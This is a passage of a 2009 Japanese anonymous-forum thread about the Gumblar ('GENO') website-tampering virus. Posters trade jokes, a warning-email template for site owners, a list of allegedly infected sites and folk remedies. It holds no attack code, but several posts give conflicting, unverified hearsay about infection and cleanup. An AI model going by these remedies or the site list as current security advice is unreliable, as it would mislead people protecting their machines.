アヴァさんがトロイの木馬が〜と逝ってたサイトがあったがGENO感染してたサイトなんだろうか・・・。
570名無しさん@九周年:2009/05/18(月) 05:51:40 ID:iMB/dKk90
>>568
構造欠陥のある車で事故多発させてるメーカーが、じゃあ他社の車
にすればいいだろで済む訳がないw
571名無しさん@九周年:2009/05/18(月) 05:57:09 ID:W0B6hhYL0
>>567
何のために糞長い契約に同意させてるんだ
572名無しさん@九周年:2009/05/18(月) 05:59:07 ID:D/G7mwwQ0
とりあえずageないとまずい希ガス
573名無しさん@九周年:2009/05/18(月) 06:07:10 ID:YksdBQtv0
構造欠陥ねw
コードの走らない箱は安全ですってか
PCの電源入れなければ安全じゃね?
574名無しさん@九周年:2009/05/18(月) 06:12:49 ID:CQ5PQc840
>>573

実際MacやLinuxのようなUNIX系のOSはアプリとシステムの実行権限を明確にわけて、
万一事故ってもエンジンに火が回らないような構造になっているわけで。

575名無しさん@九周年:2009/05/18(月) 06:21:23 ID:gBuJlK1v0
リアルもネットもパンデミックとかマジ勘弁してくれよ。
576名無しさん@九周年:2009/05/18(月) 06:32:33 ID:jjS+BUahi
>>564
夜勤組だがうちの職場はまだ大丈夫で残念だった
577名無しさん@九周年:2009/05/18(月) 07:12:29 ID:8P1Z971o0
これはマズい
578名無しさん@九周年:2009/05/18(月) 07:27:46 ID:R9lUkbpCO
伸びるのはこれから…?

とりあえず>>4に社長賞
579名無しさん@九周年:2009/05/18(月) 07:28:39 ID:U3WISzXw0
こりゃ対処のしようがないね
580名無しさん@九周年:2009/05/18(月) 07:41:11 ID:ak52KsUV0
小林製薬って変態新聞スポンサーじゃん
581名無しさん@九周年:2009/05/18(月) 07:51:26 ID:vwrjqRk+O
小林製薬の糸ようじ

水曜どうでしょうバカの脊髄反射
582名無しさん@九周年:2009/05/18(月) 08:33:13 ID:GBjgtx7b0
こんないい加減なOS売りつけやがって
583名無しさん@九周年:2009/05/18(月) 08:37:49 ID:SMVhgMVT0
こんないい加減なOS買ったのは俺らだがな
584名無しさん@九周年:2009/05/18(月) 08:39:56 ID:G5fapnht0
>>583
PC買ったら勝手に抱き合わせで買わされただけ。
585名無しさん@九周年:2009/05/18(月) 08:41:17 ID:D/G7mwwQ0
違いないな
586名無しさん@九周年:2009/05/18(月) 08:44:25 ID:B8ZXXUem0
>>583
ユーザは選んで買ったわけじゃないからw
MSが独禁法違反やらかしてまでOSの選択肢潰しやった挙げ句のこの有様。
587名無しさん@九周年:2009/05/18(月) 08:47:19 ID:71KEgZXC0
現代の日本にMacを買えない地域があるとは知らなかった。
588名無しさん@九周年:2009/05/18(月) 08:49:56 ID:JApQiiL10
cmdでdos立ちあがんねぇwwwwwwwwwwwww俺のpcオタワwwwwwwwwwwマイアミwwwwwwwwwwww
対処わかるまで電源付けっぱなしかよ。一時中断は大丈夫だよな?
589名無しさん@九周年:2009/05/18(月) 08:52:26 ID:SMVhgMVT0
>>584,586
リナクソでも入れりゃいいじゃん
590名無しさん@九周年:2009/05/18(月) 08:56:40 ID:4Acil75q0


日立がBeOSのプリインストールの意思をMicrosoftに伝えたところ、Microsoftが彼らの怒りを
伝えるために2人のマネージャーを日本に派遣し、Beとの間の合意やWindowsライセンスについ
て再考するように促した。その結果、起動シーケンスからBeOSの存在を示すものは排除され、
BeOSの起動はフロッピーディスクを必要とする手間のかかるものになってしまったという。
また、Compaqが計画していたBeOS搭載のIAも、Microsoftの圧力により開発途上で中止とな
ったという。

http://pc.watch.impress.co.jp/docs/2002/0220/be.htm


591名無しさん@九周年:2009/05/18(月) 08:57:39 ID:AOqKJlzKO
>>584,586
はLinuxが使えないから文句を言ってるわけで
592名無しさん@九周年:2009/05/18(月) 08:58:52 ID:pbw9Zw7f0
XP厨m9(^Д^)プギャー
593名無しさん@九周年:2009/05/18(月) 08:59:22 ID:W/YIvSOb0
XPだけど、Norton入れてたら大丈夫?
594名無しさん@九周年:2009/05/18(月) 09:01:21 ID:SkqoCQVV0
ノートンなんて飾りです
595名無しさん@九周年:2009/05/18(月) 09:03:42 ID:D/G7mwwQ0
質問ですまんが
コマンドプロンプトで
dir C:\Windows\help\mui\0411でentar押して、
いっぱい出てきたんだけどこの中のsqlsodbc.chmが50,727だったらセフセフ?
596名無しさん@九周年:2009/05/18(月) 09:09:31 ID:SkqoCQVV0
セフセフとは言い切れないのが厄介なところ。
解決策はクリーンインストールのみ。
597名無しさん@九周年:2009/05/18(月) 09:12:48 ID:ngLf6PdRO
             /)
           ///)
          /,.=゙''"/
   /     i f ,.r='"-‐'つ____   キャッシュ(現金)消されりゃいいんだよ!
  /      /   _,.-‐'~/⌒  ⌒\
    /   ,i   ,二ニ⊃( ●). (●)\
   /    ノ    il゙フ::::::⌒(__人__)⌒::::: \
      ,イ「ト、  ,!,!|     |r┬-|     |
     / iトヾヽ_/ィ"\      `ー'´     /
598名無しさん@九周年:2009/05/18(月) 09:12:51 ID:ydPdeS7X0
そもそも、小林製薬の製品で効果があったためしが無い。
全くなんなのよこの会社は!プンプン
599名無しさん@九周年:2009/05/18(月) 09:15:15 ID:qIBu8GX/0
アウアウ(^ω^)セフセフ
600名無しさん@九周年:2009/05/18(月) 09:20:07 ID:VLJ2O0E00
小林製薬の糸ようじ
601名無しさん@九周年:2009/05/18(月) 09:25:14 ID:D/G7mwwQ0
>>596>>599どっちだよ畜生!
602名無しさん@九周年:2009/05/18(月) 09:31:09 ID:Mla72aVn0
改ざんされすぎw
603名無しさん@九周年:2009/05/18(月) 09:33:14 ID:j1Q8v1ap0
やばいな、これは
604名無しさん@九周年:2009/05/18(月) 09:37:07 ID:ILjiVTks0
賠償金でマイクロソフト潰れちゃう!
605名無しさん@九周年:2009/05/18(月) 09:37:38 ID:0RQdEh9J0
糸ようじ
606名無しさん@九周年:2009/05/18(月) 09:40:40 ID:VxyGMUBDO
GENOウィルスの亜種なのか?
607名無しさん@九周年:2009/05/18(月) 09:42:35 ID:URMzF9mZO
とりあえず最新版にupdateしてJavaScriptをOFF、
セキュ板であげられていたIPを遮断した
608名無しさん@九周年:2009/05/18(月) 09:45:27 ID:ngLf6PdRO
             /)
           ///)
          /,.=゙''"/
   /     i f ,.r='"-‐'つ____   ネカフェで閲覧すりゃあいいんだよ!
  /      /   _,.-‐'~/⌒  ⌒\
    /   ,i   ,二ニ⊃( ●). (●)\
   /    ノ    il゙フ::::::⌒(__人__)⌒::::: \
      ,イ「ト、  ,!,!|     |r┬-|     |
     / iトヾヽ_/ィ"\      `ー'´     /
609名無しさん@九周年:2009/05/18(月) 09:50:49 ID:hO6Rg88U0
みっちゃんがあやしい・・・
610名無しさん@九周年:2009/05/18(月) 10:09:36 ID:I63NM3ed0
http://www.matousec.com/projects/proactive-security-challenge/results.php

Sランク
Online Armor Personal Firewall 3.5.0.14
Comodo Internet Security 3.8.65951.477
Outpost Firewall Free 2009 6.5.2724.381.0687.328
Outpost Security Suite Pro 2009 6.5.2514.381.0685
611名無しさん@九周年:2009/05/18(月) 10:34:21 ID:2ajAzTmw0
アッー!小林製薬

インターネットを見てるとブラクラに引っかかった!
そんな時ってありますよね
そんな時は小林製薬のウイルスニゲール!
薬効成分のTDNとDBがウイルスを撃退!
これで安心してインターネットを楽しめます

小林製薬のウイルスニゲール
612名無しさん@九周年:2009/05/18(月) 10:45:07 ID:3K7uShbQ0
おっ、立ってたのか
613名無しさん@九周年:2009/05/18(月) 10:46:19 ID:OAeOOqii0
>>592
ちくしょー
614名無しさん@九周年:2009/05/18(月) 11:06:55 ID:TMuyMuTt0
次スレが立つのならば、スレタイをもう少し変えたほうがいい
GENOウイルスって通称を使ってくれ
615名無しさん@九周年:2009/05/18(月) 11:10:15 ID:Ig4+Ng0D0
ネサフできねぇよ。
いつになったら治まるんだ。
いい加減にしてくれ。
616名無しさん@九周年:2009/05/18(月) 11:10:58 ID:E3Qs7hHUO
どうバカ集合糸ようじスレ
617感染サイトを発見した場合の警告メールテンプレ:2009/05/18(月) 11:14:09 ID:TMuyMuTt0

Webサイト製作 ご担当者さま
■ お願い

御社のHPに、閲覧者のPCに、第三者のサイトよりマルウェア(コンピュータウイルス)を
ダウンロードさせるスクリプトが挿入されております。
状況確認の上、感染PCからのウイルス除去と、HPの修正、閲覧者向けの告知をお願いします。

この攻撃プログラムは、Adobe Acrobat Reader、Adobe Flash Playerの脆弱性を利用して
パソコンの中にスパイプログラムを送り込みます。 Windows XP、2000とAcrobat Reader、
Flash Playerの古いバージョンが組み合わさった場合、この攻撃を受けてしまいます。

同様のスクリプトの仕込まれたHPを閲覧することで、そのPCにウイルス本体が感染します。
感染したPCを利用して、HPの更新作業を行なうと、(該当PCで稼働中のマルウェアが行なったのか、
FTPのIDとパスを盗みだした外部からのアクセスかはわかりませんが)感染を広げるための
スクリプトの埋め込みを行なうようです。

他者から報告があり、当方でも確認したところ、確かに危険コードが含まれておりました。
HP閲覧者のPCにウイルスが勝手にダウンロードされてしまうため、御社のHPが意図せぬ加害者と
なっております。

■ 確認した感染ページ
<多分、全てのページが感染中>
 ●HTMLファイルの場合
  <body>タグの直前に難読化されたコードが埋め込まれる。
  (例外的に<body>タグが存在しないページの場合は危険コードの挿入箇所を見付けられず
   危険コードが埋めこまれないようです)
 ●PHPの場合
  ファイルの最初に難読化されたコードが埋め込まれる。
 ●JSの場合
  ファイルの最後に難読化されたコードが埋め込まれる。
 その他、「images」という名称のフォルダにimages.phpというファイルが生成される事も。
618名無しさん@九周年:2009/05/18(月) 11:24:06 ID:G4+RNVgNO
感染にまったく気づいてなくて、ある時ふと再起動した瞬間死亡とか
619名無しさん@九周年:2009/05/18(月) 11:27:17 ID:TMuyMuTt0
感染確定サイト (14)    

  senn特殊光源     www.senlights.co.jp/index.html  
  livmail     www.livmail.com/3others-page/janet/tokusen/index.htm 既出  
  スカイハイプレミアム     skyhighpremium.com 追加  
  Carwash     http://www.carwash.co.jp/ 既出  
  成美○出版     www.seibidoshuppan.co.jp/ 既出  
  Akemi ○ayashi Website     replica08.web.fc2.com/ 既出。チェッカで1000%  
  主上支局     http://ssfos.hp.infoseek.co.jp/  
  テイアラモード     www.tiaramode.com ここも散々既出でしょうけど  
  ペットの姓名判断のサイト     www.laqoo.net/kyouun/pet/index.html  
  帰ってき○三日天下     mikkatenka.sakura.ne.jp/ 黒  
  烏骨鶏     www.ukokkei.co.jp 確定  
  株式会社まどか     www.madoka-soft.co.jp ここも  
  リボンマジック     www.ribbonmagic.com 発端だと言われているサイト、チェッカー結果1000%で真っ黒  
  Replica     replica08.web.fc2.com/index.html 感染確定サイト、対処予定ですが現在真っ黒。  


感染対策済みのサイト(10)

  ・小林製薬
  ・BIG-server.com】
  ・ウェルネス(医療情報提供企業)
  ・薬事日報社
  ・国交省中部地方整備局岐阜国道事務所
  ・全日本民医連
  ・総合ホビー展示即売会「ホビコン」
  ・GENO(PC通販ショップ)
  ・NHT紀尾井町グループ(自毛植毛斡旋企業)
  ・SayMove!
  ・ライブハウス「あさがやドラム」
620名無しさん@九周年:2009/05/18(月) 11:31:05 ID:Pdmhg/vaO
vistaで良かった
621 [―{}@{}@{}-] 名無しさん@九周年:2009/05/18(月) 11:50:01 ID:9jecE5R8P
avast以外は対応してないのか?
ESET使ってるんだけど一時的にでもavastに切り替えた方がいいんだろうか
622名無しさん@九周年:2009/05/18(月) 11:52:06 ID:YIcuE6ot0
製薬会社HPがウイルス感染
ちょっとしたギャグだな
623名無しさん@九周年:2009/05/18(月) 12:08:26 ID:vUnU8aGU0
晒しage
624名無しさん@九周年:2009/05/18(月) 12:11:52 ID:9v4hxk8l0
>>620
って初めて思ったんですね。わかります。
625名無しさん@九周年:2009/05/18(月) 12:16:25 ID:Kr7TWgaXO
>>621
avastが大暴れするから回避出来るよ。
まぁ後は運だわな
626名無しさん@九周年:2009/05/18(月) 12:17:06 ID:oTHQvIjAP
心配なヤツはここ見てこい

GENOウィルス亜種が爆発的に増殖か小林製薬や同人サイト他中心に感染も7
http://takeshima.2ch.net/test/read.cgi/news4vip/1242576012/
627名無しさん@九周年:2009/05/18(月) 12:18:22 ID:oGaKr69G0


>たしかにMacもOS9以前はシングルユーザーのOSだったから、デスクトップ上で起こった
>こと=システム全体に即影響で深刻なウイルスもあったが、OS XでマルチユーザーのUNIX
>になったことでシステムに勝手に変更を加えるようなウイスルは一切シャットアウトでき
>るようになった。
>
>恐ろしいのは、XPはデフォルトのユーザーが管理者権限のため実行上はシングルユーザー
>のOS9以前と同じ状況だということ。
>Windowsばかりウイルスが蔓延するのはそういう理由。


628名無しさん@九周年:2009/05/18(月) 12:18:51 ID:w2zeyofN0
Vistaだから大丈夫!(*^ー゚)b
629名無しさん@九周年:2009/05/18(月) 12:21:20 ID:e/8pD8egO
薬にウイルスじゃなくてよかったじゃないか
630名無しさん@九周年:2009/05/18(月) 12:51:15 ID:3K7uShbQ0
FTP使ってサイトやってる奴や
ネットでクレカとか使って買い物してる奴は気をつけろな
631名無しさん@九周年:2009/05/18(月) 12:52:35 ID:YIcuE6ot0
>>630
まあ気をつけると言ってもその程度だよな
632名無しさん@九周年:2009/05/18(月) 13:04:50 ID:uDkhvDNl0
ESETというかNOD32ユーザーだけど、感染してたんでクリーンインスコして
一時的にavast!に入れ替えてるよ


…単に実家にNOD32のCDを置き忘れてきたからなんだけどね
633名無しさん@九周年:2009/05/18(月) 13:08:37 ID:k8klozggO
いやーネットサーフィン超自粛とか、
気をつけることはあるさ。

仕事でネット使う場合は困るけどなー
ほんとどうしよう。。
634名無しさん@九周年:2009/05/18(月) 13:17:42 ID:SkqoCQVV0
俺なんかAdobe Acrobat ReaderもAdobe Flash Playerも
アンインストールしちゃった。
動画サイト観れねぇ。
635名無しさん@九周年:2009/05/18(月) 13:24:12 ID:rTVMMl4QP
>>634
羹に懲りて膾を吹いたんですね(^_^;)
636名無しさん@九周年:2009/05/18(月) 13:32:50 ID:JbeQeQKz0
;;;;;;;;;;;/゙::::::::::::: \::::\    ミ川川川川川川彡 
;;;;;;;/::::::::::::::::::::::: ヽ:::゙|ヽ  ミ          彡
;;;/::::::::::::::::::::::::::::::::: \l,ll,  三      な   三
/::::::::::::::::::::::: : : : :::::' ヽ || 三      ぜ   三
:::::::::::::::::::::: :     : : ::||| 三   な       三
::::::::::::::::::::        : :|||     っ   こ   三
::::::::::::::::          : :|| i    て   ん   三
:::::::::::::: : ,,,,,,,,,,,,,,,,,_    : :|| l,_    し   な   三
;;::::::::::: |     ゙゚\,  ゙|| ll゙\  ま   こ   三
:::;:::::::: : \,:::::::::::::::::::::: li  ||:::::::::l  っ   と   三
;::::::::::   .\,:::::::::::::::::::/  ,r::::_/  た  に   三
::::::::::::     ヽ一一''°  l゙ll″   ん      三
::::::::::::               l|ll    だ      三
::::::::::::            ,lll′          三
,、:::::::::            ,ll゜           三
;ヽ:::::::::::     _____ll′三         三
;;;;;ヽ:::::::::    ||___|  彡        ミ  
;;;;;;;ヽ,::::::::   |  l___|ヽ   彡川川川川ミ
;;;;;;;;;;\,,,____\_/__/  \
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;\ :::::::: ::::――ヽ
637名無しさん@九周年:2009/05/18(月) 13:41:23 ID:cH4Rf3df0
気付かなかった一応立ってたのか
sqlsodbc.chmでヘルプが開かなかったらアウツ
638名無しさん@九周年:2009/05/18(月) 13:50:40 ID:k8klozggO
パンデミックあげ。
639名無しさん@九周年:2009/05/18(月) 13:57:54 ID:w7sT445x0
楽天サイトも感染してたんかいな!!いつ頃?
4月に買い物してるよorz
640名無しさん@九周年:2009/05/18(月) 13:58:46 ID:71bcX+p40
>>324
JSという略称はすでに「ジャストシステム」が持っている。
「JaSc」という略し方はどうだろう?
641名無しさん@九周年:2009/05/18(月) 14:02:23 ID:kvG3D77Q0
このウイルスより、断然悪質なウイルスが小林
642名無しさん@九周年:2009/05/18(月) 14:06:35 ID:PLOnJFvxO
糸ようじ、なまら人気だな
643名無しさん@九周年:2009/05/18(月) 14:07:04 ID:uBFI3xDn0
マスクを付けろ、マスクを。
644名無しさん@九周年:2009/05/18(月) 14:07:29 ID:lvP+ZpPOO
製薬会社で感染(笑)
645名無しさん@九周年:2009/05/18(月) 14:07:52 ID:+tyQa6RsO
ウィルスその後に
646名無しさん@九周年:2009/05/18(月) 14:21:01 ID:0lBhpUya0
avast入れてみて、>>619の烏骨鶏のサイトアドレスをぐぐってみたら
ぐぐるの検索結果ページで変なメッセージと警告窓発動
これってどういう事?ぐぐっただけでもアウトなの?

今のところcmd・regedit起動可能、sqlsodbc.chmは50,727
電源落とすの怖ええぇぇ・・・
647名無しさん@九周年:2009/05/18(月) 14:21:06 ID:f9K7Gsdf0
>>630
クレカは保険効くから問題無いだろ?
まぁ、インフルよりこっちのウイルスが蔓延した方が
保険屋は涙目になるかもしれないけどw
648名無しさん@九周年:2009/05/18(月) 14:21:30 ID:u3wqDbKK0


これ検索サイトがやられたら大変なことになるなwwwwwwwww

ヤフー グーグル とかマジで頼んだwwwwwwwwww

俺もヤバイwwwwwwwwww


会社のシステム管理の俺も2年ぶりについに動く時が・・・。
社員に嫌な顔されるわ。笑



649名無しさん@九周年:2009/05/18(月) 14:23:25 ID:rTVMMl4QP
>>646
火狐使ってるだろ?
650名無しさん@九周年:2009/05/18(月) 14:29:02 ID:0lBhpUya0
>>649
うん
651名無しさん@九周年:2009/05/18(月) 14:34:42 ID:rTVMMl4QP
>>650
先読み機能を切れ
652名無しさん@九周年:2009/05/18(月) 14:39:06 ID:AEdKJ2Og0
これって、ひょっとして、グーグル大打撃?

グーグル検索怖くなって、最近避けるようになってきた。
653名無しさん@九周年:2009/05/18(月) 14:41:08 ID:069cP4Z90
>>651
どうやるの?
654名無しさん@九周年:2009/05/18(月) 14:41:41 ID:rTVMMl4QP
>>653
1. ロケーションバーに"about:config"と入力してEnterキーを押す。(入力する際に「"」は不要)
2. フィルタに"network.prefetch-next"と入力してEnterキーを押す。(入力する際に「"」は不要)
3. 値が"true"な場合は"true"をダブルクリックして"false"にする。(初期設定値は"true")
655名無しさん@九周年:2009/05/18(月) 14:43:02 ID:SkqoCQVV0
先読み切らないと検索トップに感染サイトの名前が出ただけで感染!
ってどっかのスレで読んだ。
656名無しさん@九周年:2009/05/18(月) 14:44:03 ID:b/g9zCMf0
スーパーハカー現る
657名無しさん@九周年:2009/05/18(月) 14:44:47 ID:069cP4Z90
>>654
ありがとう
658名無しさん@九周年:2009/05/18(月) 15:02:22 ID:hO6Rg88U0
糸ようじ菌に感染。
659名無しさん@九周年:2009/05/18(月) 15:07:54 ID:0lBhpUya0
>>651
まとめサイト見に行ってた、先読み機能もなんとかOFF官僚
サンクス
660名無しさん@九周年:2009/05/18(月) 15:34:00 ID:WehvPvneO
AVGじゃ検知されんのか・・・avestに切り替えるしかないか・・・。
661名無しさん@九周年:2009/05/18(月) 15:49:06 ID:0YzfXGVP0
セキュリティ板で暴れまくってる同人サイトの腐女子見てると

イラッと来る
662名無しさん@九周年:2009/05/18(月) 15:49:41 ID:Q8SIkBp/0
>>660
ベストを尽くしてくれそうな良いソフト名だな
663名無しさん@九周年:2009/05/18(月) 16:04:39 ID:n17zy5f8O
これJaneでjpgのリンク踏んだだけで感染するのかすら?
664名無しさん@九周年:2009/05/18(月) 16:52:25 ID:0YzfXGVP0

5 名前:192.168.0.774[sage] 投稿日:2009/05/18(月) 16:11:47 ID:ua7Ctj4Z0
>>1
テンプレの症状にある「再起動時にBSOD」は、
起動時にLANケーブルが抜かれていたり、IPブロックされていると
攻撃者のIPに繋がらないため、クラッシュさせる挙動だそうです。

22 名前:192.168.0.774[sage] 投稿日:2009/05/18(月) 16:30:30 ID:eOHkXG3n0
>>5
起動時にLANケーブルがついていたり
IPブロックされていなければ、
攻撃者のIPにつながるから、クラッシュさせる挙動をとらない
ということになるの?



692 名前: ビオラ(宮城県)[sage] 投稿日:2009/05/18(月) 16:37:39.34 ID:nQjoclSR
>>689
ウィルス引いたらLANケーブル抜けっていう初歩対処に対しての報復か
つくづく手が込んでる
665名無しさん@九周年:2009/05/18(月) 16:54:43 ID:/Yo/cfP70
767 :本当にあった怖い名無し:2009/05/17(日) 16:24:24 ID:sIzAEXxG0
Firefoxだと検索するだけで感染するから恐ろしい
666名無しさん@九周年:2009/05/18(月) 16:56:34 ID:0YzfXGVP0

現在拡散している Gumblar.cn
zlkonの亜種ですが以下のような特徴を持っています。

インジェクションコードが難解になった
バージョンチェックをユーザ側で行うため、サーバスクリプトの検出を回避している

 ※一部のIDSはサーバスクリプトへのクエリを監視しており、クライアント側でやられても判断できない

感染が容易と思われるPC環境をよりピンポイントに判断している(このため、セキュ各社の自動検出が難しくなっている)
感染しない環境には何も返さない(更に検証が難しい)

亜種の「更新」の頻度が異常にすばやく、
亜種がほとんどのセキュソフトを潜り抜けているので、シグネーチャ・ベースでの検出が難しい
 

※検出率が上がる頃には次の種類になっている
667名無しさん@九周年:2009/05/18(月) 16:58:31 ID:sTZ5SB9U0
つくづく手の込んだウィルスだなぁ

製作者の努力の結晶か
668名無しさん@九周年:2009/05/18(月) 17:03:10 ID:nB70p7340
人間、頑張って努力すれば、ここまで凄い事が出来るんだね!
669名無しさん@九周年:2009/05/18(月) 17:13:29 ID:OAeOOqii0
この努力を他の事へr
670名無しさん@九周年:2009/05/18(月) 17:21:18 ID:rTVMMl4QP
>>667
以前もLIRVAとか複合的な最強最悪ウィルスってあったからな。
世界的に偽札作りと同じくらいの重大犯罪として対処しない限り、
もっと強力なのがいくらでも作られる。
671名無しさん@九周年:2009/05/18(月) 18:08:33 ID:wQSjB5Wk0
もう糞ニートプログラマの就職活動に付き合わされるのは嫌だお・・・
672名無しさん@九周年:2009/05/18(月) 18:08:42 ID:tABKxumw0
おそろしい
673名無しさん@九周年:2009/05/18(月) 18:11:12 ID:tABKxumw0
早くセキュリティ会社もなんとかしてほしい
確認とって今は自分いいけどさ
674名無しさん@九周年:2009/05/18(月) 18:19:22 ID:0YzfXGVP0
http://www.so-net.ne.jp/security/news/view.cgi?type=2&log=top

■商標登録ホットライン

商標登録専門サイト「商標登録ホットライン」を運営する大槻国際特許事務所(大阪市東淀川区)は15日、
同サイトが改ざんされていたことを明らかにした。

■アイマジック

ゲームソフト制作のアイマジック(本社:神奈川県)は14日、同社サイトの一部が改ざんされていたことを明らかにした。

■BIG-server.com、再び改ざん

ゼロ(札幌市厚別区)が運営するレンタルサーバーのBIG-server.comは14日、
「maido3.com」ホームページ内の「【ぷろじぇくと ぞうさん】〜E-Bananaサーバ 構築日記〜」の
トップページが改ざんされていたことを明らかにした。

■ミュージック・オン・ティーヴィ

衛星放送の音楽専門チャンネルを運営するミュージック・オン・ティーヴィ(本社:東京都港区)は14日、
同社サイト「MUSIC ON! TV」の一部が改ざんされ、不正なスクリプトが埋め込まれていたことを明らかにした。

■ライブハウス あさがやドラム

ライブハウス あさがやドラム(東京都杉並区)のホームページが改ざんされていたことが分かった。

■小林製薬

小林製薬(本社:大阪市中央区)は12日、同社サイトの一部が改ざんされていたことを明らかにした。

(2009/05/18 セキュリティ通信)
675名無しさん@九周年:2009/05/18(月) 18:20:28 ID:fz1hV5/D0
普通に、Flash Player アップデートすれば解決だろ、JK。
676名無しさん@九周年:2009/05/18(月) 18:24:22 ID:PNqedQe/0
flashとreaderアンインストール
これに勝る物はないのだよ、ヤマトの諸君
677名無しさん@九周年:2009/05/18(月) 18:41:09 ID:WC7uk+4o0
>>670
このウイルスってどのくらいの価値(損害)があるんだろう、貨幣的に
678名無しさん@九周年:2009/05/18(月) 18:47:50 ID:K5E4wBeH0
とりあえずFlash Player最新にしてAdobe Readerアンインスコ
pdfなんか使わねえしもうイラネ
679名無しさん@九周年:2009/05/18(月) 18:48:20 ID:0YzfXGVP0
>>677
米ScanSafeは、「gumblar.cn」がばらまいた悪質なファイルは、
ボットネットからの命令を待つためのバックドアをインストールするようだとしている。

ボットネットとは、悪意のある攻撃者によって構築され、
インターネット経由の命令によって遠隔操作をされてしまっているコンピュータ群のことである



思うままに何万というコンピュータを操作して情報取り出せるならその価値プライスレスじゃ?w
680名無しさん@九周年:2009/05/18(月) 18:50:46 ID:0v9O0YQQ0
firefoxの連中は先読み機能で即死か?
681名無しさん@九周年:2009/05/18(月) 18:51:27 ID:693WARvU0
製薬会社でウイルスとはww
682名無しさん@九周年:2009/05/18(月) 18:51:59 ID:PNqedQe/0
俺のPCが遠隔操作されて
「個人情報来たアルよ・・・」
「アイヤー男の裸ばかりアルヨ! 隔離アルヨ」

ふふふ、ボットの愚か者が
683名無しさん@九周年:2009/05/18(月) 18:56:35 ID:PNqedQe/0
そういや、おとといあたりから ようつべに繋がりにくいんだが、あそこも 感染ルンです?
684名無しさん@九周年:2009/05/18(月) 18:58:06 ID:47IveJYV0
金盾
685名無しさん@九周年:2009/05/18(月) 19:07:09 ID:iBPMR6230
mixiのトップページとか感染したらえらいことになるな
686名無しさん@九周年:2009/05/18(月) 19:11:33 ID:+kJukHsV0
小林製薬って変態新聞スポンサーで
オカ板の呪いかかってたな
687名無しさん@九周年:2009/05/18(月) 19:12:16 ID:/pGmA5eK0
ノートンも対応したとか聞いたけど、今のところ対応してるのは
avastとノートン(未確認)だけ?
688名無しさん@九周年:2009/05/18(月) 19:13:25 ID:0v9O0YQQ0
これって、感染してる人がhtmlをftpでアップロードすることによって
感染サイトが一丁上がりって感じ?
689名無しさん@九周年:2009/05/18(月) 19:15:44 ID:0v9O0YQQ0
>>372
ああ、こうやって感染するのか。
690名無しさん@九周年:2009/05/18(月) 19:18:59 ID:0YzfXGVP0
そもそもの発端はここらしいが、未だに対処なしか?

リボンマジック公式サイト
このサイトはコンピュータに損害を与える可能性があります。
このたび、諸般の事情により『Kram〜サヨナラによく似た時計の音楽〜』のリボンマジックでの ...
リボンマジックの次回作につきましては、準備ができ次第、当サイトで発表いたします。
今後とも、リボンマジックへのご愛顧のほど、よろしくお願いいたし ...
www.ribbonmagic.com/ - 類似ページ

リボンマジック BBS
このサイトはコンピュータに損害を与える可能性があります。
リボン マジック公式サイト☆ リボンマジックの公式サイトへようこそ。
ゲームの紹介、情報等。18禁乙女ゲームメーカー。
www.ribbonmagic.com/FS-APL/FS-BBS/index.cgi?Code=bbs - 類似ページ

691名無しさん@九周年:2009/05/18(月) 19:38:34 ID:WC7uk+4o0
ミクシーもフラッシュたんまり使っているんだよねぇ。
692名無しさん@九周年:2009/05/18(月) 19:54:23 ID:MRASmGrc0
GENO様曰く、「キャッシュ削除すりゃ大丈夫」だろ。
お前ら心配するな。

それはそうとアンチウイルスソフトを過信するなよ。
結局は自分次第だ。
693名無しさん@九周年:2009/05/18(月) 20:16:45 ID:+kJukHsV0
まとめ見たりチェックしたりしたけど
もう面倒くさくなったのでAdobeはアンインストした。
動画サイト見れなくなったけど気にしないwww
694名無しさん@九周年:2009/05/18(月) 20:33:11 ID:yoax0n8Z0
同じくadobeの全部抜いたw
感染しないですむならそれでおけ
動画はワクチン出来てから見るよ

火狐でジャバスクリプトも切ったしノースクリプト入れた
ぐぐる先生の先読み機能も切った
2ちゃんは専ブラのみ、ふらふらネサフするのはヤメ
これで感染したら悲しすぎる。



695名無しさん@九周年:2009/05/18(月) 20:56:53 ID:NlsFiN+qO
・・・ダチに小林製薬のホムペがウイルス食らってやべーらしいぞと言う話を聞いて、わざわざ覗きにいっちまった。
数日前の話だが・・・



くそっ、小林製薬はフェミニーナ軟膏をカユマンコナオールに改名しろ!
696名無しさん@九周年:2009/05/18(月) 21:05:02 ID:gFMRd/suO
パソコンを起動したら変な音が聞こえてきたんだが。
気になって音量マックスにしたら外国男がハァハァ言ってる
アバストでウイルス検査してもなにも出てこねーし。身に覚えが腐るほどあるだけに恐いよ
697名無しさん@九周年:2009/05/18(月) 21:07:07 ID:ZY9p6jjL0
閲覧だけじゃ無理だろ
特にトロイだと、埋め込まれた実行部が仮想ファイルかなんかで起動しないと動くわけないし。
下手なプラグインとか入ってるからじゃないの? javascript有効とかさ。
698名無しさん@九周年:2009/05/18(月) 21:07:26 ID:NlsFiN+qO
>>696
それたぶんマイケルだな。
699名無しさん@九周年:2009/05/18(月) 21:15:41 ID:GzROcZt10
テレビ局の陰謀だな
ネットの方がおもろいしテレビなんて見てねーよwww
なんていってるから
700名無しさん@九周年:2009/05/18(月) 21:16:08 ID:OAeOOqii0
>>698
コンセントに足引っかけて転ぶだけじゃないんだなw
701名無しさん@九周年:2009/05/18(月) 21:17:26 ID:yn2upanS0
adobe Flashのアップデートってどうやるの?
普通にインストールすればアップデートしてくれるの?
702名無しさん@九周年:2009/05/18(月) 21:22:35 ID:pC10Vnc/O
プロンプトもregeditも起動するからセフセフか
つかgeno問題拡散してたのかよwww
703名無しさん@九周年:2009/05/18(月) 21:29:16 ID:GzROcZt10
>>702
亜種だとそこは問題なくとも感染してたってのあるみたいだから
気になるなら対策やってるとこいって調べたらいい
704名無しさん@九周年:2009/05/18(月) 21:30:08 ID:gFMRd/suO
>>698
俺はホモでもショタでもねーぞ!ロリコン一筋だ。なんでマイケルが俺のパソにいつくのか小一時間説明して貰おうか
705名無しさん@九周年:2009/05/18(月) 21:31:49 ID:Ub3OrSwrO
>>699このウイルスは海外産
706名無しさん@九周年:2009/05/18(月) 21:32:13 ID:1R40pn2I0
>>701
インストールしたいブラウザで
http://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
にアクセスしてバージョンチェックして
そこにあるリンクから
ダウンロード→アップデート→フラッシュプレーヤに移動してインスコ。


普段Firefoxしか使ってないから確認したら、IEのフラッシュバージョンは9だったw
707名無しさん@九周年:2009/05/18(月) 21:37:28 ID:WC7uk+4o0
いちごきんたまとコレどっちが兇悪?
こっちか
708名無しさん@九周年:2009/05/18(月) 21:37:58 ID:v8PTQ2lFP
